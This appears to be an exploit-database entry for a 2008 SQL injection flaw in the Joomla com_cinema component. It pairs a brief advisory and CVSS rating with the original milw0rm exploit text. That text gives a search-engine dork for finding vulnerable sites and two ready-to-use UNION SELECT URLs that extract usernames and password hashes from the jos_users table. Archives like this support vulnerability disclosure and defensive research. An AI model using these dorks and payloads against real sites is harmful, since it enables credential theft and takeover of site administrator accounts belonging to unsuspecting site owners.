header-logo
Suggest Exploit
vendor:
Cinema
by:
S@BUN
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Cinema
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:vamba_and_luscarpa:cinema
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla Component com_cinema SQL Injection

The vulnerability exists due to insufficient filtration of user-supplied data passed to the 'id' parameter in 'index.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. This can be exploited to bypass authentication and gain access to the application with administrative privileges.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

##########################################
#
# Joomla Component com_cinema SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAiL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: "com_cinema"
#
###########################################
EXPLOiT 1 :

index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat(username,0x3a,password)/**/from/**/jos_users/*

EXPLOiT 2 :

index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,29,29,30,concat(username,0x3a,password)/**/from/**/jos_users/*

###########################################
------------------S@BUN-------------------#
###########################################
-----hackturkiye.hackturkiye@gmail.com----#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################

side note:

  <name>Cinema</name>
  <creationDate>25.03.2006</creationDate>
  <author>Vamba & Luscarpa</author>
  <copyright>Copyright 2006 by Vamba & Luscarpa.</copyright>
  <license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license>  
  <authorEmail>webmaster@joomlaitalia.com - webmaster@webagain.net</authorEmail>

  <authorUrl>www.joomlaitalia.com - www.webagain.net</authorUrl>
  <version>1.0</version>
  <description>Componente Cinema per organizzare la tua videoteca. Componente realizzato sulla base di Akogallery</description>

# milw0rm.com [2008-03-23]